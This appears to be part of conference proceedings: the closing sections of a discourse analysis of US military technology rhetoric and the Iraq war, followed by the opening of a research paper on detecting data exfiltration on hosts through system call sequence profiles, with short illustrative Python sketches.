warfare. It argues for, and elaborates on, what should be prepared for. The narrative starts from the<br />
recognition of the human limitations in the complex world, created by the clash of different ideologies<br />
and cultures, and further supplemented by advances in technology and changes in the economy.<br />
The complex world affects, according to the report, the "battle of narratives". If winning the battle is<br />
important, winning the battle of narratives is "absolutely crucial". The report concludes that<br />
Dominating the narrative of any operation, whether military or otherwise, pays enormous<br />
dividends. [...] In the battle of narratives, the United States must not ignore its ability to<br />
bring its considerable soft power to bear in order to reinforce the positive aspects of Joint<br />
Force operations. Humanitarian assistance, reconstruction, securing the safety of local<br />
populations, military-to-military exercises, health care, and disaster relief are just a few<br />
examples of the positive measures that we offer.<br />
This statement is interesting, as we have witnessed the emergence of operations 'other than war'. In<br />
the narrative of Operation Iraqi Freedom, the military leadership put much focus on the humanitarian<br />
aspect of the operation. But the "battle of narratives" manifested itself not only in word choices such<br />
as liberate and humanitarian aid, but also in words such as precision-guided weapons. The emphasis<br />
on the use of precision-guided munitions can be seen as a semantic tactic. Technology is part of the<br />
narrative.<br />
JOE10 mentions the words deter and deterrence several times, and finally concludes that deterrence<br />
will be the "primary purpose" of the military forces. This explains the threat discourse: the only way to<br />
deter is to excel over the rest in skill, capacity and resources. Deterrence will be created by drawing on<br />
education and science: "The Services should draw from a breadth and depth of education in a range<br />
of relevant disciplines to include history, anthropology, economics, geopolitics, cultural studies, the<br />
‘hard’ sciences, law, and strategic communication", the report states. It also stresses that in the future,<br />
asymmetric and irregular warfare will be more likely than conventional warfare, and that the U.S.<br />
military should be prepared for this:<br />
Irregular wars are more likely, and winning such conflicts will prove just as important to<br />
the protection of America’s vital interests and the maintenance of global stability.<br />
To summarize the report, we make the following conclusions: In strategy, techno-speak<br />
1. is part of the "battle of narratives"<br />
2. is based on threat discourse<br />
3. serves the function of deterrence<br />
These conclusions serve as the starting point for the linguistic part of the analysis.<br />
5.1 Narrating the doctrine: Effects Based Operations briefing<br />
This briefing aired on the same day that the coalition forces started Operation Iraqi Freedom by<br />
bombing Baghdad. In this briefing, Colonel Gary Crowder (the division chief at Air Combat Command<br />
and the plans director for Strategy, Concepts and Doctrine) introduces the concept of Effects Based<br />
Operations (EBO) to the public. The role and type of technology descriptions in it will be discussed in<br />
this section.<br />
Two types of clauses are included in the analysis: those where the 'doer' is technology, and those<br />
where the 'doer' is 'us' (the US, Coalition Forces, etc.).<br />
When looking at the clauses where technology is the Actor, the main observations are that in these<br />
descriptions the typical process is a description of 'enabling', and the object of action (Goal or Range,<br />
often in a projected clause) is abstract or ambiguous:<br />
Table 1: Technology as a doer<br />
# | ACTOR | PROCESS (material) | BENEFICIARY<br />
1 | these analytical tools | enable | us [...] to find alternative methodologies<br />
2 | [PGM] [...] | give | us the ability for a large number of other aircraft besides just stealth aircraft to hit multiple weapons per targets<br />
3 | its stealth qualities | enable | us to do a large number of things<br />
4 | [the stealth] | enables | us to do a lot more stuff<br />
5 | the stealth | does give | us some capabilities in addition to the precision<br />
In action descriptions where the Actor is human or animate, there are two main types. The first type<br />
consists of descriptions of dynamic military action and capability:<br />
Table 2: Human as a doer<br />
# | ACTOR/CARRIER | PROCESS (material or relational) | GOAL/RANGE/POSSESSED<br />
6 | we | were able to take down | the air defense system<br />
7 | we | were able to neutralize | those towers<br />
8 | we | can hit | multiple targets<br />
9 | we | have | much more dual-use capability in each of the Air Force's, Navy's and Marines' fighter aircraft as well as our bomber aircraft<br />
10 | we | have | an improved ability to go after adversary's systems<br />
The action descriptions refer to the use of weapons and technology. In descriptions of military action,<br />
the process is typically material (physical) and the object of the action is inanimate and often abstract.<br />
The data also contains a number of possessive attributive action descriptions (having something),<br />
where the entity possessed is typically capability or ability, both abstract. The evaluation of the first<br />
ten sample clauses is positive. The Process (often combined with the Goal/Range) signals social<br />
esteem in the form of capacity; Technology and Self are described as competent, expert and<br />
powerful. The objects of action are inanimate, which signals Social Sanction: the one acting is good,<br />
moral and ethical by attacking non-human targets.<br />
The second type consists of action descriptions that are somewhere between material and mental<br />
processes:<br />
Table 3: Human as a doer<br />
# | SENSER | PROCESS (mental) | PHENOMENON<br />
11 | I | would prioritize | [...] those targets<br />
12 | we | look at | the desired effects we want to create on the battlespace<br />
13 | we | evaluate | the target sets that we need to do, that -- those effects that we need to create on the battlespace<br />
14 | we | bring | those together into a integrated plan<br />
15 | we | literally come up with | a high heaven objective<br />
These descriptions highlight the analytical part of waging war: the planning and creation of<br />
strategy. In this context we will analyze them as mental processes, because they are strongly<br />
contrastive to the material processes of attacking and neutralizing, and their purpose is to emphasize<br />
the role of the scientific and creative planning process in warfare. The evaluation in the above clauses<br />
is, just like in the first ten, positive. Capacity is signaled with descriptions of observation, consideration<br />
and learnedness. These Process types can further be characterized as perceptive and cognitive<br />
(Halliday, 2004: 210).<br />
To put it briefly, the source text emphasizes Capacity that is realized by descriptions of having both<br />
inner (ability, cognitive skills) and outer (material, technological) resources. Of all action, the emphasis<br />
is on inner experience: Weapons are of course used, but after a planning process that is described as<br />
highly scientific. In addition to action descriptions, the briefing contained a number of nominal<br />
constructions that are worth noting:<br />
Table 4: Nominalizations<br />
Nominal constructions: technology<br />
the combination of a fortuitous development of different capabilities and technologies<br />
the development of the laser-guided bombs<br />
the capability of a Joint Direct Attack Munition<br />
the evolution of about the last 20 years<br />
the evolution of both the Air Force and the Navy and Marine Corps' combat<br />
our ability to go after targets<br />
The above nominalizations capture the semantic content of the action descriptions: development,<br />
capability, evolution, ability. The order of these nominalizations creates a narrative of evolving and<br />
developing capability that finally is utilized as an ability. This narrative creates a concept of<br />
advancement and technological omnipotence.<br />
5.2 Discussion<br />
There are two major players in the Grand Narrative of War: Technology is the enabler, and 'we' are<br />
the able. The ability technology creates is to wage war effectively, precisely and securely and so save<br />
lives by avoiding casualties and collateral damage. Technology is the prerequisite for humanity in<br />
warfare. In this narrative, war has evolved into "Effects Based Operations" on one hand, and into<br />
humanitarian operations on the other. The result is war's new image, which is slowly drifting further<br />
and further away from the killing, and closer and closer to implementing humanity. This is the source<br />
of the binary rhetoric of 'bombing for peace' and 'destroying the village to save it'.<br />
The frequently occurring words capacity and capability are abstract umbrella terms that may mean<br />
anything from having the financial or human resources to operate, to the quality of weapons<br />
systems, planning, or the mass of the actual weapons. These are everyday terms in strategy and<br />
operations discussed in public, and they allow the speaker to carry out the tactic of neutrality through<br />
vagueness.<br />
The technology descriptions in American war-speak perform the function of deterrence. As the Joint<br />
Operating Environment 2010 (United States Joint Forces Command, 2010) concludes, the task of<br />
deterrence will be increasingly important. This, however, raises the question of whether the asymmetric<br />
and irregular enemy the report describes can be deterred and, if so, whether technology as a<br />
deterrent will work. Insurgents use inexpensive and asymmetric forms of combat, to which the U.S.<br />
responds with expensive countermeasures. According to the 2008 National Defense Strategy,<br />
deterrence must include both military and non-military tools, and "changes in capabilities,<br />
especially new technologies" help to create a credible deterrence. Metz (2007: 65) elaborates on the<br />
logic of fighting insurgency with technology:<br />
Counterinsurgency experts long have argued that technology is unimportant in this type<br />
of conflict. While it is certainly correct that technology designed to find and destroy a<br />
conventional enemy military force had limited application, other types such as nonlethal<br />
weapons and robotics do hold promise for difficult tasks such as securing populated<br />
areas, preventing infiltration, and avoiding civilian casualties.<br />
While the counterinsurgency (COIN) strategy emphasizes the integration of military and non-military<br />
means, the military still turns to technology for answers. EBO, once justified with the promise of new<br />
technologies, has been abandoned and replaced with a 'Comprehensive Approach'. These new<br />
(or, if not new, then updated) strategies are justified with 'even less' collateral damage and 'even<br />
better' precision, enabled by technology. The names of the applied strategies change, but the<br />
discourse (and the weapons used) remains the same. The deterrence the West imposes means<br />
smaller and smaller missiles (yet more lethal than ever), satellites and stealth drones (that both<br />
observe us and guide missiles) and cyberspace. Virilio (2009) calls this "aesthetics of disappearance".<br />
The collective Western outlook no longer tolerates alternatives that would make war visible. At the<br />
same time, we fear the unseen.<br />
The Joint Operating Environment 2010 (ibid.) also remarks that individual soldiers are increasingly<br />
"global communication producers". According to the report, in the "battle of narratives" the role of the<br />
"strategic corporal whose acts might have strategic consequences if widely reported" is significant. By press-briefing<br />
the media and embedding journalists in 'liberation operations', the military leadership is<br />
creating strategic communication that is convincing enough to appeal not only to the public, but also<br />
to the soldier, who has to be supervised and controlled by the system and as part of the system, not<br />
as an individual. In the words of the COIN Field Manual: "Information operations (IO) must be<br />
aggressively employed" to "obtain local, regional, and international support for COIN operations" and<br />
"discredit insurgent propaganda and provide a more compelling alternative to the insurgent ideology<br />
and narrative".<br />
6. Conclusion<br />
The Revolution in Military Affairs presents the new identity of war as a system of technologies, an<br />
ideology which manifests itself in military discourse. In addition, system thinking, such as EBO, has<br />
created the demand for both internal and external control in the Western military force. This<br />
combination of strategically significant military contractors, techno-faith and the need to dominate and<br />
control have led to strategic communication, which contains the Grand Military Narrative. According to<br />
this Grand Narrative, technology executes, with precision, reliability and from a distance, the duties<br />
determined by analytical, rational and morally virtuous humans. The public role of the military is to 'do<br />
good'. In this narrative, war is removed from the battlefields into the virtual.<br />
The binary roles of the military result in binary rhetoric, and this is very visible in the analysis<br />
introduced in this article. Whereas the adversary, the insurgents, conduct hands-on warfare based on<br />
the assumption that the insurgent will die in the process, the West distances itself from the discomfort<br />
both physically (drones and missiles) and mentally (distance and simulation) and tolerates no losses.<br />
'We' cling onto everything we have, whereas 'they' have little to lose. 'We' fight the enemy in the<br />
exact opposite way from the way they fight 'us': the US is portrayed as evolved and scientific, while the<br />
majority of the militaries in the rest of the world employ very different methods of warfare. This makes<br />
the discourse on the threats of asymmetric enemies interesting. Is it not the RMA that distanced 'us'<br />
from the enemy and created asymmetry, the Frankenstein we are now terrified of?<br />
The Grand Military Narrative is full of paradoxes. Rhetoric, strategy and reality do not meet. The result<br />
is that we are deterring an asymmetric enemy (that cannot be deterred) with weapons (that cannot be<br />
seen), and paying more than we can afford in order to do so (while the enemy pays close to nothing).<br />
The paradox here is that in an arms race against asymmetric enemies, the winner is not the one who<br />
has the most advanced technology, but the one who tolerates the greatest losses.<br />
References<br />
Allen, Patrick D. (2010) Information Operations Planning, Boston: Artech House.<br />
Boisot, M. H., MacMillan, I. C. and Han, K. (2007) Explorations in Information Space. Knowledge, Agents, and<br />
Organisation, London: Oxford University Press.<br />
Campen, A. (1996) Cyberwar, Washington D.C.: AFCEA Press.<br />
Campen, A. (1992) The First Information Warfare: The Story of Computers and Intelligence Systems in the<br />
Persian Gulf War, Washington D.C.: AFCEA International Press.<br />
Czosseck, C. and Geers, K. (Eds.) (2009) The Virtual Battlefield: Perspectives on Cyber Warfare, Amsterdam:<br />
IOS Press.<br />
David, G. J. and McKeldin III, T.R. (Eds.) (2009) Ideas as Weapons. Influence Perception in Modern Warfare,<br />
Washington D.C.: Potomac Books.<br />
Der Derian, J. (2009) Virtuous War, New York: Routledge.<br />
Fainaru, S. and Klein, A. (2007) 'In Iraq, a Private Realm Of Intelligence-Gathering', Washington Post, 1 July,<br />
[Online], Available: http://www.washingtonpost.com [19 Oct 2010].<br />
Halliday, M.A.K. (2004) An Introduction to Functional Grammar. Revised by Matthiessen, C.M.I.M., London:<br />
Arnold.<br />
Johnston, W. (2010) 'War Games Lure Recruits For 'Real Thing'', NPR, 31 July, [Online],<br />
Available: http://www.npr.org/templates/story/story.php?storyId=128875936 [19 Oct 2010].<br />
Krishnan, A. (2009) Killer Robots. Legality and Ethicality of Autonomous Weapons, Burlington: Ashgate.<br />
Libicki, M. (1996) What is Information Warfare? Washington DC: National Defense University Press.<br />
Matthews, W. (2010) 'Smaller, Lighter, Cheaper: New Missiles Are 'Absolutely Ideal' for Irregular Warfare',<br />
Defense News, 31 May, [Online], Available: http://www.defensenews.com/story.php?i=4649372 [19 Oct<br />
2010].<br />
Metz, S. (2007) Learning from Iraq: Counterinsurgency in American strategy, [Online], Available:<br />
http://www.strategicstudiesinstitute.army.mil/pubs/download.cfm?q=752 [19 Oct 2010].<br />
Rantapelkonen, J. (2006) The Narrative Leadership of War: Presidential Phrases in the 'War on Terror' and their<br />
Relation to Information Technology. Doctoral Dissertation. Publication Series 1, Research n:o 34, Helsinki:<br />
National Defence University.<br />
Risen, J. & Mazzetti, M. (2009) 'C.I.A. Said to Use Outsiders to Put Bombs on Drones', New York Times, 20 Aug,<br />
[Online], Available: http://www.nytimes.com/2009/08/21/us/21intel.html [19 Oct 2010].<br />
Stahl, R. (2010) Militainment, INC. War, Media, and Popular Culture, New York: Routledge.<br />
Shimko, K. L. (2010) The Iraq Wars and America’s Military Revolution, New York: Cambridge University Press.<br />
Soeters, J., van Fenema P.C., & Beeres, R. (Eds.) (2010) Managing Military Organizations: Theory and practice,<br />
London: Routledge.<br />
Taylor, P. (2003) Munitions of the Mind: A History of Propaganda from the Ancient World to the Present Day, 3rd<br />
edition, Manchester: Manchester University Press.<br />
Thearmyexperience (2008) Inside the Army Experience Center, [video online]<br />
Available: http://www.youtube.com/watch?v=-lZKV9bP_0Q [19 Oct 2010].<br />
Toffler, A. (1981) The Third Wave, New York: Bantam Books.<br />
Toffler, A . & Toffler, H. (1993) War and Anti-War: Survival at the Dawn of the 21st Century, Boston: Little, Brown<br />
& Co.<br />
United States Joint Forces Command. (2010) The Joint Operating Environment 2010 [Online], Available:<br />
http://www.jfcom.mil/newslink/storyarchive/2010/JOE_2010_o.pdf [19 Oct 2010].<br />
U.S. Department of Defense (2008) 2008 National Defense Strategy, [Online], Available:<br />
http://www.defense.gov/news/2008%20national%20defense%20strategy.pdf [19 Oct 2010]<br />
U.S. Department of Defense (2003) Effects Based Operations Briefing. Transcript, 19 March, [Online], Available:<br />
http://www.defense.gov/Transcripts/Transcript.aspx?TranscriptID=2067 [19 Oct 2010].<br />
Wichner, D. (2010) 'Raytheon's new Griffin fit for drone', Arizona Daily Star, 22 Aug, [Online], Available:<br />
http://azstarnet.com/business/local/article_ff437ef6-c69d-56c6-aeff-e74d0d5902b9.html [19 Oct 2010]<br />
Ventre, D. (2007) Information Warfare, London: Wiley.<br />
Virilio, P. (2009) The Aesthetics of Disappearance, Translated by Philip Beitchman, Los Angeles: Semiotext(e).<br />
Virilio, P. (1989) War and Cinema. The Logistics of Perception, Translated by Patrick Camiller, London: Verso.<br />
Wiest, A. (2006) Rolling Thunder in a Gentle Land: The Vietnam War Revisited, London: Osprey Publishing.<br />
Zizek, S. (2009). Pehmeä vallankumous. Translated by Janne Porttikivi, Helsinki: Gaudeamus.<br />
Unpublished<br />
XX. (2010) “On Making War Possible: Strategic Thinking, Soldiers’ Identity, and Military Grand Narrative”.<br />
(Unpublished manuscript in Security Dialogue)<br />
Host-Based Data Exfiltration Detection via System Call<br />
Sequences<br />
Brian Jewell¹ and Justin Beaver²<br />
¹Tennessee Technological University, Cookeville, USA<br />
²Oak Ridge National Laboratory, Oak Ridge, USA<br />
bcjewell21@tntech.edu<br />
beaverjm@ornl.gov<br />
Abstract: The host-based detection of malicious data exfiltration activities is currently a sparse area of research,<br />
mostly limited to methods that analyze network traffic or signature-based detection methods that target<br />
specific processes. In this paper we explore an alternative host-based detection method that exploits<br />
sequences of system calls and new collection methods that allow us to catch these activities in real time. We<br />
show that system call sequences can be found to reach a steady state across processes and users, and explore<br />
the viability of new methods as heuristics for profiling user behaviors.<br />
Keywords: data exfiltration, data security, intrusion detection<br />
1. Introduction<br />
A successful attack on an organization involving the theft of sensitive data can be devastating. Data<br />
exfiltration is the term used to describe this type of theft and can be defined as the unauthorized<br />
transfer of information from a computer system. Data exfiltration attacks represent a tremendous<br />
threat to both government entities and commercial enterprises.<br />
Government organizations maintain repositories for sensitive and classified information, and breaches<br />
into protected systems or leaks into the public domain can have implications that threaten national<br />
security. Commercial enterprises manage complex levels of proprietary tools and data that, if<br />
compromised, could endanger the financial security of their institutions and/or their customers. Recent<br />
studies find that information leaks are the most prevalent security threat for organizations 0 and that in<br />
recent years attackers have exfiltrated more than 20 terabytes of data, much of which is sensitive,<br />
from the U.S. Department of Defense and Defense Industrial Base organizations, as well as civilian<br />
government organizations 0.<br />
Despite the threat, the approach to defending against these attacks is surprisingly unsophisticated.<br />
Off-the-shelf intrusion detection systems (IDS) monitor for known malicious network signatures at the<br />
system boundary. These systems are relied upon to flag potential network breaches, which are then<br />
typically investigated manually (often these are guided analyses that leverage custom-built scripts) in<br />
order to trace potential unauthorized activities. Unfortunately, the model of perimeter defense leaves<br />
attackers free to navigate, investigate, and extrude information if the perimeter is breached<br />
undetected.<br />
Host intrusion detection systems (HIDS) are software programs that run on each computer host in a<br />
network and attempt to detect malicious events in the operation of the host. Commercial virus<br />
protection packages (McAfee, 2003) are examples of HIDS and monitor system services, registry<br />
changes, and check individual files for signatures of known malicious programs. We approach the<br />
detection of data exfiltration attacks as a HIDS. Once the boundary defense is breached, it is from the<br />
individual hosts that a malicious user will explore file systems, package data, and export it to an<br />
outside network. We postulate that, given insight into the activities of individual users and processes<br />
on a given host, acts of unauthorized data exfiltration can be discriminated from normal user/process<br />
behaviors.<br />
Our hypothesis hinges on the availability of low-level data that reflects the operation of processes on<br />
a computer host. We propose to achieve this insight into the computer’s operation through the<br />
monitoring of system calls, which are low-level process interactions with the host computer’s<br />
operating system. System calls provide a window into what all processes and users on a host<br />
machine are executing, regardless of how they are interacting with the machine. In addition, they<br />
provide more fidelity in identifying individual actions than a process monitor.<br />
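To make the per-user, per-process bookkeeping this implies concrete, it might be sketched as follows (a minimal illustration under our own assumptions; the event tuple layout and function name are hypothetical, not the authors' implementation):

```python
from collections import defaultdict

def group_traces(events):
    """Group a host's syscall event stream into ordered per-(user, pid) traces.

    `events` is assumed to be an iterable of (pid, user, syscall_name)
    tuples, e.g. as parsed from an OS auditing facility.
    """
    traces = defaultdict(list)
    for pid, user, syscall in events:
        traces[(user, pid)].append(syscall)  # order within each process is preserved
    return dict(traces)

events = [
    (101, "alice", "open"), (101, "alice", "read"),
    (202, "bob", "socket"), (101, "alice", "write"),
    (202, "bob", "connect"), (101, "alice", "close"),
]
traces = group_traces(events)
# traces[("alice", 101)] is the ordered trace ["open", "read", "write", "close"]
```

Each resulting trace is then available for the kind of sequence analysis discussed below.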
In this paper, we propose a method in which unique sequences of system calls, managed<br />
at the process/user level, form the basis for discriminating normal from anomalous user behaviors,<br />
for use as an exfiltration detection agent. We then evaluate this model against our three criteria for a<br />
viable detection agent:<br />
Tractable: the chosen method must be able to run in real time while having negligible effect on the<br />
system as experienced by the end user.<br />
Environmentally neutral: the method must also be portable and adapt to any environment.<br />
Responsive: lastly, the ideal method should reliably report on data exfiltration behaviors.<br />
The following sections are organized as follows: Section 2 provides a review of similar work. Section 3<br />
formalizes the methodology we used to categorize normal behavior and collect a profile from the<br />
system call data traces. Section 4 evaluates our method according to the three criteria we set, and<br />
Section 5 gives a detailed account of our results, conclusions, and ideas for future work.<br />
2. Related work<br />
The detection of data exfiltrations has been a recent focus of cyber security research. Exfiltration<br />
detection is a difficult problem due to the wide range of methods available, and the subtlety with which<br />
it can be performed 0. Current IDSs are mostly concerned with intrusion attempts, although<br />
there are extrusion detection systems that are commercially available (e.g., 0). Like network-based<br />
IDSs, these are primarily signature-based solutions that perform network traffic analysis through<br />
custom hardware.<br />
Many more advanced data analysis approaches have been proposed, including clustering of network<br />
traffic for anomaly detection 0, the application of statistical and signal processing methods to<br />
outbound traffic for signature identification 0, and the application of data mining techniques 0 to<br />
network data. These approaches yielded varying degrees of success, but inevitably were plagued<br />
with base-rate fallacy 0 issues or a narrow problem focus.<br />
However, when we look at previous work on host-based IDSs there is some inspiration for host-based<br />
data exfiltration detection. In 1996, Forrest et al. proposed a host-based intrusion detection method<br />
based on the monitoring of system calls (Forrest, 1996). This early work was inspired by the human<br />
immune system's ability to recognize which cells are part of the host organism (its self) and which are foreign (non-self).<br />
They used this principle in developing their own methodology for constructing a "sense of self"<br />
for Unix-based systems using available system trace data.<br />
Forrest’s methodology used lookahead pairs, or sets containing pairs of system calls formed by the<br />
originating system call and the one that follows it at spacings 1, 2, 3, ..., k. These pairs were used to<br />
form a database of normal process behavior (or self), and to monitor for previously unseen<br />
patterns, which were then tagged as anomalous (or non-self). While their results were only preliminary,<br />
they did show that a stable signature of normal process behavior could be constructed using very<br />
simple methods.<br />
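The lookahead-pair scheme can be sketched in a few lines (a simplified illustration of the idea, not Forrest et al.'s original code; the function names and toy traces are ours):

```python
def lookahead_pairs(trace, k):
    """All (call, follower) pairs where the follower occurs within k positions."""
    pairs = set()
    for i, call in enumerate(trace):
        for d in range(1, k + 1):
            if i + d < len(trace):
                pairs.add((call, trace[i + d]))
    return pairs

def non_self(trace, normal_db, k):
    """Pairs in a new trace that never occurred in training (tagged non-self)."""
    return lookahead_pairs(trace, k) - normal_db

# 'Self' is built from observed normal behavior ...
normal = lookahead_pairs(["open", "read", "write", "close"], k=2)
# ... and a trace containing an unexpected call produces non-self pairs:
suspect = non_self(["open", "read", "socket", "close"], normal, k=2)
# every pair involving "socket" is flagged
```

The appeal of the scheme is that both training and monitoring are simple set operations, which is what makes it cheap enough for real-time use.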
Many other approaches have been taken since to model the behavior of processes using system<br />
calls, including the use of Hidden Markov Models (HMM) (Gao, 2006), neural networks (Endler, 1998),<br />
k-nearest neighbors (Liao, 2002), and Bayes models (Kosoresow, 1997). These models were all<br />
developed in hopes of producing more accurate models while reducing false positives, but this comes at<br />
a high computational cost. The most notable advantage of Forrest's model is the ability to track<br />
processes for anomalous behavior at the application layer of each individual host in real time at a very<br />
low computational cost.<br />
Forrest et al. later improved upon their work in (Forrest, 2008) by introducing another simple model<br />
suitable for real-time detection, dubbed sequence time-delay embedding (stide), which again<br />
involves the enumeration of system call sequences. However, this time their method uses contiguous<br />
sequences of fixed length to form a database of normal behavior. They also introduce a<br />
modification to their method called sequence time-delay embedding with frequency threshold (t-stide).<br />
This method explores the hypothesis that sequences with very low occurrence rates in training data<br />
are suspicious.<br />
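A stide-style database and the t-stide frequency threshold might be sketched as follows. The window length, the threshold value, and the names used here are our own illustrative assumptions, not the authors' implementation.

```python
from collections import Counter

def stide_profile(trace, n=6):
    """Count every contiguous length-n sequence in the trace (stide).

    The keys of the resulting Counter form the database of normal
    behavior; any future window absent from it is treated as anomalous.
    """
    return Counter(tuple(trace[i:i + n]) for i in range(len(trace) - n + 1))

def t_stide_rare(counts, threshold):
    """t-stide refinement: sequences whose occurrence rate in the
    training data falls below the threshold are also treated as suspicious."""
    total = sum(counts.values())
    return {seq for seq, c in counts.items() if c / total < threshold}
```

With a repetitive trace, a handful of windows dominates the counts, and rarely seen windows fall below the t-stide threshold.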
Brian Jewell and Justin Beaver<br />
Forrest et al. tested these methods against two popular machine learning methods: one based on<br />
RIPPER, a rule-learning system developed by William Cohen (Cohen, 1995) that was later adapted<br />
by Lee et al. (Lee 1998, 1999) to learn rules that predict system calls and find anomalies, and the other<br />
based on HMMs as used in (Gao, 2006). While they were not able to show that stide performed better<br />
than the other methods, they did conclude that it performed comparably to more complicated<br />
methods.<br />
Our work most closely parallels that of Forrest and leverages host-based system call<br />
information to detect anomalous user behaviors. Unlike previous work, we seek to implement and<br />
adapt this approach as a user- and process-centric analysis process to detect data exfiltration<br />
agents.<br />
3. Methodology<br />
Our model for data exfiltration detection focuses on the analysis of system calls used in a host’s<br />
operation and hinges on observations similar to those found in previous work by Forrest et al. (Forrest,<br />
2008). This section justifies the use of sequences of system calls as a mechanism for defining normal<br />
behaviors in Section 3.1, discusses variants for optimizing system call sequences in Section 3.2, and<br />
compares these variants for use as data exfiltration detectors in Section 3.3.<br />
3.1 Defining normal in sequences of system calls<br />
A system call trace or system call sequence is the ordered list of system calls as invoked by a process<br />
that spans the length of execution by a given user. An example system call trace for a given user<br />
might be:<br />
“..., open, read, fstat, fstat, write, close, mmap,...”,<br />
where “open”, “read”, “fstat”, etc. are all examples of system call names. All invoked user<br />
operations, whether command line imperatives or the operations of a running program, use various<br />
combinations of system calls to complete their tasks. Even simple commands, such as a directory<br />
listing, use a sequence of multiple system calls to execute.<br />
While there are a number of current methods to enumerate system call sequences, there is a<br />
common theme: to form a data store of traces that are used to characterize normal behaviors (also<br />
referred to as a normal profile) in a given environment. Once the data store is established, it can be<br />
used as the basis for identifying future sequences as normal (within the set) or anomalous (not<br />
included in the set). In addition, it is desirable for any automated comparison of this profile with<br />
experienced events to be computationally tractable.<br />
Previous research (Forrest, 2008) on host-based IDSs that attempted to use system call<br />
sequences to detect anomalous behaviors concentrated on detecting anomalies in program<br />
execution. That is, the focus of the analysis was on individual processes and their execution, and did not<br />
take into account the uniqueness of each individual user.<br />
By contrast, when attempting to detect data exfiltrations, we are more interested in the behavior<br />
specific to a user. However, in order to create a normal profile that is specific to a user, it must be<br />
established that system call sequences are suitable for discriminating normal and anomalous<br />
behaviors in such a context.<br />
Given that, experientially, user behavior seems to vary drastically depending on the task being<br />
performed at any given moment, it is necessary to support the claim that unique system call<br />
sequences for a user can be generalized.<br />
We performed an experiment in which the unique system call sequences for individual users were<br />
tracked. The results of this experiment are illustrated in Figure 1. We define a stable profile as one<br />
that plateaus at a given size (N sequences). It is the asymptotic nature of this curve that makes<br />
anomaly detection possible.<br />
That is, in a given trace, the number of sequences generated can always be observed to "step" or to<br />
plateau under normal usage and to increase suddenly when a user performs a new or unusual action.<br />
Figure 1 demonstrates that, despite varying operations by users, a normal profile can be established<br />
and characterized by a tractable (< 200) number of unique system call sequences.<br />
Figure 1: Number of unique system call sequences for a given user/process versus the total number<br />
of system calls<br />
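The plateau behavior described above can be reproduced in miniature by tracking the cumulative count of unique windows over a trace. The synthetic trace below is purely illustrative; the real profiles are built from live trace data.

```python
def unique_sequence_growth(trace, n=6):
    """Cumulative number of unique length-n sequences after each window.

    Under repetitive (normal) use the curve plateaus; a novel action
    shows up as a sudden step upward.
    """
    seen, growth = set(), []
    for i in range(len(trace) - n + 1):
        seen.add(tuple(trace[i:i + n]))
        growth.append(len(seen))
    return growth

# A repetitive workload stabilizes at 3 unique windows; appending a
# never-seen action produces a visible step at the end of the curve.
curve = unique_sequence_growth(["open", "read", "close"] * 20
                               + ["socket", "connect", "write"], n=3)
```

Plotting such a curve yields the step-and-plateau shape of Figure 1.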
3.2 Models for system call sequences<br />
For our testing we implemented three different simple methods for enumerating system calls. The first<br />
of these methods is implemented very similarly to stide (Warrender, 1999). The method uses a sliding<br />
window of size N across all system calls included in a trace to form the sequences. However, we have<br />
adapted the method to incorporate UID/process name pairs to create a profile of our trace data.<br />
We also wanted to take care in choosing an appropriate value of N for our<br />
implementation. The best value of N for stide and similar implementations is discussed in<br />
a number of previous works. Kosoresow et al. (Kosoresow, 1997) suggest “the best sequence length<br />
to use would be 6 or slightly higher than 6,” and Kymie and Maxion (2002), in a paper dedicated to the<br />
singular question of “Why 6?”, provide empirical evidence supporting this conjecture.<br />
However, while evaluating our own variable sequence length method we identified another, possibly<br />
more fundamental, reason to pick a sequence size of 6. In Figure 2 we see the number of unique<br />
sequences present in a complete “normal” profile generated by our variable length sequence collector<br />
over one week.<br />
It is interesting to note the dramatic decrease in the number of sequences that occur with a length<br />
greater than 6. As the value of N increases, the accuracy of the generated profile increases<br />
proportionately to the percentage of system call sequences that fall under that size. However, we also<br />
increase our learning time and profile complexity by the same proportions. Therefore, for our<br />
experiments we also use 6 for the length of our sequences.<br />
The next model is designed to avoid an apparent shortcoming of the windowing method: many<br />
sequences of length 1 or 2 repeat continuously, so fitting them exactly with the<br />
windowing method requires substantial unnecessary overhead. This is also demonstrated in Figure 2,<br />
and leads us to theorize that a method utilizing a variable window length would perform better than<br />
the previous methods.<br />
While developing an approach to create variable-length sequences of system calls, it was important to<br />
preserve the low run-time complexity of the sliding window method while attempting to better model<br />
normal behavior. Thus, a simple solution was chosen: to construct our variable sequences we<br />
choose subsequences such that sequence length is maximized while no single system call is repeated. This is<br />
implemented by constructing a sequence as calls are being traced and beginning a new sequence<br />
whenever a call is found to be a repeat of one already in the current sequence.<br />
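This splitting rule might be implemented as the following sketch; the names are ours, and the paper's actual collector operates on live trace output rather than a Python list.

```python
def variable_sequences(trace):
    """Split a trace into maximal sequences containing no repeated call.

    A new sequence begins as soon as the incoming call is already
    present in the current one, so each sequence is as long as possible
    without any system call appearing twice.
    """
    sequences, current = [], []
    for call in trace:
        if call in current:              # repeat found: close the sequence
            sequences.append(tuple(current))
            current = []
        current.append(call)
    if current:                          # flush the trailing sequence
        sequences.append(tuple(current))
    return sequences
```

The variant with arguments reuses this same splitting logic but treats each call as a (probefunc, errno, args) tuple instead of a bare name.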
Figure 2: Number of unique sequences observed with the size N (x-axis)<br />
Up to this point we have ignored the additional information available about each system call in building our normal<br />
profile. Thus, we implemented a third method that additionally uses the error number (errno) and function<br />
arguments when matching sequences.<br />
This method follows the same methodology as the variable length sequences: unique system call<br />
sequences are selected in such a way that length is maximized while no single system call is repeated<br />
in a given sequence. However, here we define a system call as the tuple {probefunc, errno, args}.<br />
3.3 Comparison and discussion<br />
To validate our methods we tested them against each other. In Figure 3 we show the increase in the<br />
number of sequences generated over one week of collection for a given UID/execname pair. From<br />
Figure 3 we can observe that the variable sequence length method both finishes training a normal<br />
profile faster and uses fewer sequences than both of the other methods, as hoped. This is likely in<br />
part due to the observation that the majority of sequences have a length of less than 6, and that the shorter<br />
the sequence, the more often it repeats (refer back to Figure 2).<br />
Another observation we can make from Figure 3 is that the variable-with-arguments method reaches a<br />
stable state faster than the windowing method, and without an unacceptably large increase in the<br />
number of unique sequences. Again, this is most likely due to the better fitting of high-frequency<br />
sequences.<br />
The surprise comes in how poorly the windowing method performs in terms of generating a stable<br />
profile. Overall the windowing method performs well, but when the testing is stretched over the period<br />
of a week the method fails to show the same level of stabilization as the other two methods. Thus, for all<br />
purposes the variable method seems superior, with the addition of arguments requiring a much larger<br />
database, which correlates with many more false positives. Since detection speed and precision are what<br />
we are interested in, we use the variable method for the remainder of our testing.<br />
